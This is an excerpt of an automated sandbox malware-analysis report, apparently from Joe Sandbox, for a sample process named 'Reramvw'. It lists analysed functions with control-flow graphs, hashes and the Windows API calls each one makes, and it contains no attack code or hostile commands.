                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 496af4d481fba1c75efb433cf734d2b45ea408a027714e1b119b64e65e0ae57b
                                                                                • Instruction ID: 770ef18e6ed5b53ce8fd5093b0e6e30d8c4acbbf8d0c41a59f1e3a8deea848e7
                                                                                • Opcode Fuzzy Hash: 496af4d481fba1c75efb433cf734d2b45ea408a027714e1b119b64e65e0ae57b
                                                                                • Instruction Fuzzy Hash: 6511F4B1D002099FCB10DFAAC585AAEFBF5FF48314F10842AD419A7250CB79A945CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A0C928 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1070 2a0c928-2a0c9a0 VirtualAlloc 1073 2a0c9a2-2a0c9a8 1070->1073 1074 2a0c9a9-2a0c9ce 1070->1074 1073->1074
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02A0C993
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2152760246.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2a00000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 76a9ec37a4b8bd117647e841ba071e2e0699e64abc320b6d290fc742b1a30e59
                                                                                • Instruction ID: e41c87bae81d68d602a2cff4fe458f1e33cbd1c5bd1d29f8e271495a337bbf0c
                                                                                • Opcode Fuzzy Hash: 76a9ec37a4b8bd117647e841ba071e2e0699e64abc320b6d290fc742b1a30e59
                                                                                • Instruction Fuzzy Hash: 831137759002089FCB10DFAAC845BEFFBF5EF48324F10841AD519A7250CB79A540CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0101D030 Relevance: .1, Instructions: 74COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1136 101d030-101d042 1137 101d0d3-101d0da 1136->1137 1138 101d048 1136->1138 1139 101d04a-101d056 1137->1139 1138->1139 1141 101d05c-101d07e 1139->1141 1142 101d0df-101d0e4 1139->1142 1143 101d080-101d09f call 2a0c2e0 1141->1143 1144 101d0e9-101d0fe 1141->1144 1142->1141 1146 101d0a3-101d0b3 1143->1146 1148 101d0b5-101d0bd 1144->1148 1146->1148 1149 101d10b 1146->1149 1150 101d100-101d109 1148->1150 1151 101d0bf-101d0d0 1148->1151 1150->1151
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2152329871.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_101d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7082fd4efbddab73bc98f5763273151ca914b9e050eb206b9a213331eaa5e749
                                                                                • Instruction ID: 8db823817b62a8858e8c5c4adb0686f6a700b03c0613e70dfb26230859524bb9
                                                                                • Opcode Fuzzy Hash: 7082fd4efbddab73bc98f5763273151ca914b9e050eb206b9a213331eaa5e749
                                                                                • Instruction Fuzzy Hash: F8212571504204DFCB16DF98D9C8B2ABFA5FB84310F20C5A9E9490B24AC33ED406CBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06C56B6D Relevance: .1, Instructions: 59COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1154 6c56b6d-6c56b80 1155 6c56bf6-6c56c8e 1154->1155 1156 6c56b82 1154->1156 1162 6c56c9a-6c56cb6 1155->1162 1156->1155 1165 6c50072-6c50078 1162->1165 1166 6c56cbc-6c56cbf 1162->1166 1167 6c50081-6c5dbaa 1165->1167 1168 6c5007a-6c57729 1165->1168 1166->1165 1168->1165 1175 6c5772f-6c57732 1168->1175 1175->1165
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e5c6e434bb4eb7bd754924e2d5d8a65a65e62ca4076a0f439eab40670e563de7
                                                                                • Instruction ID: 68df13d0767a84db0608550d37eb68c2f04ac66fc3c82c6973f3a9389ba41a08
                                                                                • Opcode Fuzzy Hash: e5c6e434bb4eb7bd754924e2d5d8a65a65e62ca4076a0f439eab40670e563de7
                                                                                • Instruction Fuzzy Hash: 85210874A042548FD755CF68C884A99BBF5FF49314F0584AAD849AB355CB34EE82CF50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0101D02B Relevance: .1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2152329871.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_101d000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                                                                • Instruction ID: 1d9b0a1d8bcb946b3131c447f02aa50e74eaf6dd7ce6d3047fe8f06a2a8cfdcd
                                                                                • Opcode Fuzzy Hash: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                                                                • Instruction Fuzzy Hash: 3F11E676504280DFDB12CF54D9C4B16BFB2FB84314F24C5A9E9490B65BC33AD45ACBA2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06C51831 Relevance: .0, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 88af5eb7a4eca41d0739ad6e097bba9f4cff0c6ad4b5d60451f14526dfc9e708
                                                                                • Instruction ID: dfbcca54db62bec26080cc170b5b4e92718b4521b016c922ed0470612679a861
                                                                                • Opcode Fuzzy Hash: 88af5eb7a4eca41d0739ad6e097bba9f4cff0c6ad4b5d60451f14526dfc9e708
                                                                                • Instruction Fuzzy Hash: A7012534E082688FDB65DF28C854799B7B2FB99300F0080E6D909E7344DB78AE80CF41
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06C53BF4 Relevance: .0, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4e9781d9cbc9ea5d71c82079f79ba289413ec9db3bc996fa61a5642d61dde995
                                                                                • Instruction ID: afd6c504d4433d05feeb958fa2ae7254c0fc270793643621fcf1985edb147546
                                                                                • Opcode Fuzzy Hash: 4e9781d9cbc9ea5d71c82079f79ba289413ec9db3bc996fa61a5642d61dde995
                                                                                • Instruction Fuzzy Hash: 26F0E234A0114A8FF752EF58D8557D97BA2FF96310F0000EAC90E9B395EB341A82CB42
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06C52AB6 Relevance: .0, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fdb1b73aae527c193063ae6327f4a9841d3573d7da010788f3c8d1e232db19ef
                                                                                • Instruction ID: 5723c8bc376d61f29b0a7c452154e2c81df3028ca3537d3c4678c05ad48539bb
                                                                                • Opcode Fuzzy Hash: fdb1b73aae527c193063ae6327f4a9841d3573d7da010788f3c8d1e232db19ef
                                                                                • Instruction Fuzzy Hash: 9C019274A442198FD765DF18D844A99B7B2FB58301F1081E6D589E7394DF345E808FA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06C54130 Relevance: .0, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 73d5522ec01ca86199122d078f5e268117dbc158b726afb2ca388ce17f2c8cdc
                                                                                • Instruction ID: 74aa8bb443d5e4ce74a6a88bc02c52f5231197d7c816c92bb738bb70771f9f3d
                                                                                • Opcode Fuzzy Hash: 73d5522ec01ca86199122d078f5e268117dbc158b726afb2ca388ce17f2c8cdc
                                                                                • Instruction Fuzzy Hash: C0F03774A401188FEB55EF58C855A9DB7B2FB58300F1140E5D549AB394CB346E81CF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06C52A8F Relevance: .0, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c1f08f2a56d2f349dd39950b62be42b054ce1e9d91170691d376fe720867183
                                                                                • Instruction ID: 2a599cb60839029e9e44694d3f652ad60dddafc3a06bb59759d4a5630e2d2df4
                                                                                • Opcode Fuzzy Hash: 8c1f08f2a56d2f349dd39950b62be42b054ce1e9d91170691d376fe720867183
                                                                                • Instruction Fuzzy Hash: F3F03070A041588FD794EF58D8806997BE1BB9D310F1241A5C949E7244D7349D418F99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06C50A95 Relevance: .0, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ae08729cdf4387d9d7c3aed5e9dd95911d7143dcb1c9bb23a8ff31982dc86c6a
                                                                                • Instruction ID: 089716e36f37fe14b9d8fbefc2a7f298a4e9d33431337efe8f5076dec851bfc7
                                                                                • Opcode Fuzzy Hash: ae08729cdf4387d9d7c3aed5e9dd95911d7143dcb1c9bb23a8ff31982dc86c6a
                                                                                • Instruction Fuzzy Hash: F8F058B8A01014CFEB15DF08C840AA9B7B2FB98301F1081D9DA49EB398CA34AD418F61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06C561E3 Relevance: .0, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 64bdeeee7bdb3c7995d76df752517cc581b84489c0d45b4c87883769123d73e2
                                                                                • Instruction ID: 466f9f7b2b2a795293936ebfec21e35edfefaf6f751e58d7300e68c5a7ab4b9f
                                                                                • Opcode Fuzzy Hash: 64bdeeee7bdb3c7995d76df752517cc581b84489c0d45b4c87883769123d73e2
                                                                                • Instruction Fuzzy Hash: F3D0A934A44201AFE3908A98D884AC637A0E718330F054222A90AB3281EAAC4C828BA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06C5F970 Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2159496219.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_6c50000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:11.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:152
                                                                                Total number of Limit Nodes:20
                                                                                execution_graph 41692 5fd62f8 41694 5fd632d 41692->41694 41693 5fd6514 41694->41693 41696 5fd81a0 41694->41696 41698 5fd81c1 41696->41698 41697 5fd81e5 41697->41693 41698->41697 41701 5fd8350 41698->41701 41705 5fd8340 41698->41705 41702 5fd835d 41701->41702 41704 5fd8396 41702->41704 41710 5fd62e0 41702->41710 41704->41697 41706 5fd82eb 41705->41706 41707 5fd834f 41705->41707 41708 5fd8396 41707->41708 41709 5fd62e0 4 API calls 41707->41709 41708->41697 41709->41708 41711 5fd62eb 41710->41711 41713 5fd8408 41711->41713 41714 5fd6e58 41711->41714 41713->41713 41715 5fd6e63 41714->41715 41721 5fd6e68 41715->41721 41717 5fd8477 41725 5fdd900 41717->41725 41733 5fdd918 41717->41733 41718 5fd84b1 41718->41713 41724 5fd6e73 41721->41724 41722 5fd9878 41722->41717 41723 5fd81a0 4 API calls 41723->41722 41724->41722 41724->41723 41727 5fdd918 41725->41727 41726 5fdd955 41726->41718 41727->41726 41742 5fddb90 41727->41742 41746 5fddb80 41727->41746 41728 5fdd995 41751 5fdee81 41728->41751 41760 5fdee90 41728->41760 41736 5fdd949 41733->41736 41737 5fdda49 41733->41737 41734 5fdd955 41734->41718 41735 5fdd995 41740 5fdee81 2 API calls 41735->41740 41741 5fdee90 2 API calls 41735->41741 41736->41734 41738 5fddb90 3 API calls 41736->41738 41739 5fddb80 3 API calls 41736->41739 41737->41718 41738->41735 41739->41735 41740->41737 41741->41737 41769 5fddbe0 41742->41769 41778 5fddbd0 41742->41778 41743 5fddb9a 41743->41728 41747 5fddb7f 41746->41747 41747->41746 41749 5fddbe0 2 API calls 41747->41749 41750 5fddbd0 2 API calls 41747->41750 41748 5fddb9a 41748->41728 41749->41748 41750->41748 41752 5fdee90 41751->41752 41794 5fdf3e0 41752->41794 41799 5fdf3d0 41752->41799 41753 5fdef3e 41754 5fdcf90 GetModuleHandleW 41753->41754 41756 5fdef6a 41753->41756 41755 5fdefae 41754->41755 41757 5fdfd65 CreateWindowExW 41755->41757 41757->41756 41761 5fdeebb 41760->41761 41766 5fdf3e0 GetModuleHandleW 41761->41766 41767 5fdf3d0 GetModuleHandleW 41761->41767 41762 5fdef3e 41763 5fdcf90 GetModuleHandleW 41762->41763 41765 5fdef6a 41762->41765 41764 5fdefae 41763->41764 41824 5fdfd65 41764->41824 41766->41762 41767->41762 41770 5fddbf1 41769->41770 41773 5fddc14 41769->41773 41787 5fdcf90 41770->41787 41773->41743 41774 5fddc0c 41774->41773 41775 5fdde18 GetModuleHandleW 41774->41775 41776 5fdde45 41775->41776 41776->41743 41779 5fddbd5 41778->41779 41780 5fdcf90 GetModuleHandleW 41779->41780 41782 5fddc14 41779->41782 41781 5fddbfc 41780->41781 41781->41782 41786 5fdde69 GetModuleHandleW 41781->41786 41782->41743 41783 5fdde18 GetModuleHandleW 41785 5fdde45 41783->41785 41784 5fddc0c 41784->41782 41784->41783 41785->41743 41786->41784 41788 5fdddd0 GetModuleHandleW 41787->41788 41790 5fddbfc 41788->41790 41790->41773 41791 5fdde69 41790->41791 41792 5fdcf90 GetModuleHandleW 41791->41792 41793 5fdde8c 41792->41793 41793->41774 41795 5fdf40d 41794->41795 41796 5fdf48e 41795->41796 41804 5fdf550 41795->41804 41814 5fdf540 41795->41814 41800 5fdf40d 41799->41800 41801 5fdf48e 41800->41801 41802 5fdf550 GetModuleHandleW 41800->41802 41803 5fdf540 GetModuleHandleW 41800->41803 41802->41801 41803->41801 41805 5fdf565 41804->41805 41806 5fdcf90 GetModuleHandleW 41805->41806 41807 5fdf589 41805->41807 41806->41807 41808 5fdcf90 GetModuleHandleW 41807->41808 41813 5fdf745 41807->41813 41809 5fdf6cb 41808->41809 41810 5fdcf90 GetModuleHandleW 41809->41810 41809->41813 41811 5fdf719 41810->41811 41812 5fdcf90 GetModuleHandleW 41811->41812 41811->41813 41812->41813 41813->41796 41815 5fdf550 41814->41815 41816 5fdcf90 GetModuleHandleW 41815->41816 41817 5fdf589 41815->41817 41816->41817 41818 5fdcf90 GetModuleHandleW 41817->41818 41823 5fdf745 41817->41823 41819 5fdf6cb 41818->41819 41820 5fdcf90 GetModuleHandleW 41819->41820 41819->41823 41821 5fdf719 41820->41821 41822 5fdcf90 GetModuleHandleW 41821->41822 41821->41823 41822->41823 41823->41796 41825 5fdfd69 41824->41825 41826 5fdfd9d CreateWindowExW 41824->41826 41825->41765 41828 5fdfed4 41826->41828 41828->41828 41829 5fde038 41830 5fde07a 41829->41830 41831 5fde080 LoadLibraryExW 41829->41831 41830->41831 41832 5fde0b1 41831->41832 41833 18d0848 41835 18d084e 41833->41835 41834 18d091b 41835->41834 41837 18d1380 41835->41837 41838 18d1396 41837->41838 41839 18d1490 41838->41839 41843 18d7319 41838->41843 41847 18d7440 41838->41847 41854 18d7328 41838->41854 41839->41835 41844 18d733e 41843->41844 41846 18d74aa 41844->41846 41858 689e33f 41844->41858 41846->41838 41848 18d744a 41847->41848 41849 18d7464 41848->41849 41852 689c450 3 API calls 41848->41852 41867 689c441 41848->41867 41850 18d74aa 41849->41850 41853 689e33f 3 API calls 41849->41853 41850->41838 41852->41849 41853->41850 41856 18d733e 41854->41856 41855 18d74aa 41855->41838 41856->41855 41857 689e33f 3 API calls 41856->41857 41857->41855 41859 689e34a 41858->41859 41862 689c450 41859->41862 41861 689e351 41861->41846 41863 689c465 41862->41863 41864 689c67a 41863->41864 41865 689caa8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41863->41865 41866 689ca60 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41863->41866 41864->41861 41865->41863 41866->41863 41869 689c450 41867->41869 41868 689c67a 41868->41849 41869->41868 41870 689caa8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41869->41870 41871 689ca60 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 41869->41871 41870->41869 41871->41869 41872 18d7268 41873 18d72ae DeleteFileW 41872->41873 41875 18d72e7 41873->41875

                                                                                Executed Functions

                                                                                Function 05FDDBE0 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3048 5fddbe0-5fddbef 3049 5fddc1b-5fddc1f 3048->3049 3050 5fddbf1-5fddbfe call 5fdcf90 3048->3050 3052 5fddc21-5fddc2b 3049->3052 3053 5fddc33-5fddc74 3049->3053 3056 5fddc14 3050->3056 3057 5fddc00-5fddc0e call 5fdde69 3050->3057 3052->3053 3059 5fddc76-5fddc7e 3053->3059 3060 5fddc81-5fddc8f 3053->3060 3056->3049 3057->3056 3066 5fddd50-5fdde10 3057->3066 3059->3060 3061 5fddc91-5fddc96 3060->3061 3062 5fddcb3-5fddcb5 3060->3062 3064 5fddc98-5fddc9f call 5fdcf9c 3061->3064 3065 5fddca1 3061->3065 3067 5fddcb8-5fddcbf 3062->3067 3069 5fddca3-5fddcb1 3064->3069 3065->3069 3099 5fdde18-5fdde43 GetModuleHandleW 3066->3099 3100 5fdde12-5fdde15 3066->3100 3070 5fddccc-5fddcd3 3067->3070 3071 5fddcc1-5fddcc9 3067->3071 3069->3067 3074 5fddcd5-5fddcdd 3070->3074 3075 5fddce0-5fddce9 call 5fd6144 3070->3075 3071->3070 3074->3075 3079 5fddceb-5fddcf3 3075->3079 3080 5fddcf6-5fddcfb 3075->3080 3079->3080 3081 5fddcfd-5fddd04 3080->3081 3082 5fddd19-5fddd26 3080->3082 3081->3082 3084 5fddd06-5fddd16 call 5fdbb00 call 5fdcfac 3081->3084 3089 5fddd49-5fddd4f 3082->3089 3090 5fddd28-5fddd46 3082->3090 3084->3082 3090->3089 3101 5fdde4c-5fdde60 3099->3101 3102 5fdde45-5fdde4b 3099->3102 3100->3099 3102->3101
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: fa9479c77c21d5c1f049956ccfe474888dd37a170a91c39db162420e61b93d81
                                                                                • Instruction ID: c2a0f07f6ff01b0f2887e1f46a04976b9dfd466d0b11e89534ec75daf827e0c2
                                                                                • Opcode Fuzzy Hash: fa9479c77c21d5c1f049956ccfe474888dd37a170a91c39db162420e61b93d81
                                                                                • Instruction Fuzzy Hash: 16812570A00B458FDB24DF29D444B6AFBF6FF88300F048929D446D7A50D779E945CBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 05FDFD65 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3105 5fdfd65-5fdfd67 3106 5fdfd9d-5fdfe16 3105->3106 3107 5fdfd69-5fdfd90 call 5fdd14c 3105->3107 3110 5fdfe18-5fdfe1e 3106->3110 3111 5fdfe21-5fdfe28 3106->3111 3112 5fdfd95-5fdfd96 3107->3112 3110->3111 3113 5fdfe2a-5fdfe30 3111->3113 3114 5fdfe33-5fdfed2 CreateWindowExW 3111->3114 3113->3114 3116 5fdfedb-5fdff13 3114->3116 3117 5fdfed4-5fdfeda 3114->3117 3121 5fdff15-5fdff18 3116->3121 3122 5fdff20 3116->3122 3117->3116 3121->3122 3123 5fdff21 3122->3123 3123->3123
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05FDFEC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: d72b387a56c8046f64d66fbb6ff12f116ffbc27eb2691af1ee5ac7c8523ba494
                                                                                • Instruction ID: b1e162a0b783622eb895bf2a610314316597981a324087c1e3c270265cdc1ac1
                                                                                • Opcode Fuzzy Hash: d72b387a56c8046f64d66fbb6ff12f116ffbc27eb2691af1ee5ac7c8523ba494
                                                                                • Instruction Fuzzy Hash: 7051E1B1C00249AFDF15CF99C884ADEBFB6FF49300F14812AE819AB221D7759945CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0689D668 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2343876651.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6890000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7a3c17c122951a91bb2d7fd204d4a51460014880d0a08cd0f791e32c2533d6ed
                                                                                • Instruction ID: 986996ee027b1956ef669e7bd67bfad78da48f27193f58abd247457a70b06027
                                                                                • Opcode Fuzzy Hash: 7a3c17c122951a91bb2d7fd204d4a51460014880d0a08cd0f791e32c2533d6ed
                                                                                • Instruction Fuzzy Hash: EA412571D047999FCB00DFA9D8002AEBBF1BF89310F18896AD908E7251DB789845CBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 05FDFDA4 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05FDFEC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 00f6435c2a30e93824f3459cabc16fb82609a280f1dd7118148a7ec039b22d2a
                                                                                • Instruction ID: b7d91d444e519f9ae1709b2c6be650a9a6cc071f2aed93920cbec362666f1be6
                                                                                • Opcode Fuzzy Hash: 00f6435c2a30e93824f3459cabc16fb82609a280f1dd7118148a7ec039b22d2a
                                                                                • Instruction Fuzzy Hash: 9F51D3B1D003499FDB14CF99C884ADEFBB6FF48310F24812AE419AB250D7759945CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 05FDFDB0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05FDFEC2
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2342518720.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5fd0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: b8a78dd06359582220f34679b652ea7b8a08a4c19daff9ef3ab659f5dc19ee20
                                                                                • Instruction ID: 3a6fb9f91778152a616a69ddba271f8ab42864aeb7c2d7c4a5de9b093c5af354
                                                                                • Opcode Fuzzy Hash: b8a78dd06359582220f34679b652ea7b8a08a4c19daff9ef3ab659f5dc19ee20
                                                                                • Instruction Fuzzy Hash: B741B2B1D003499FDB14CF99C884ADEFBB6FF48310F24852AE419AB250D7759945CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 018D7261 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 018D72D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2330970059.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_18d0000_Reramvw.jbxd
                                                                                Similarity
                                                                                • API ID: DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 4033686569-0
                                                                                • Opcode ID: 38c308545c429fcded1b7e8eac335a3e500444cdaa3cc4cd9e7f6290e6426f92
                                                                                • Instruction ID: 156d74124a7356ea7845311fae0d5203e23f92d14336ec953f259c260501ac70
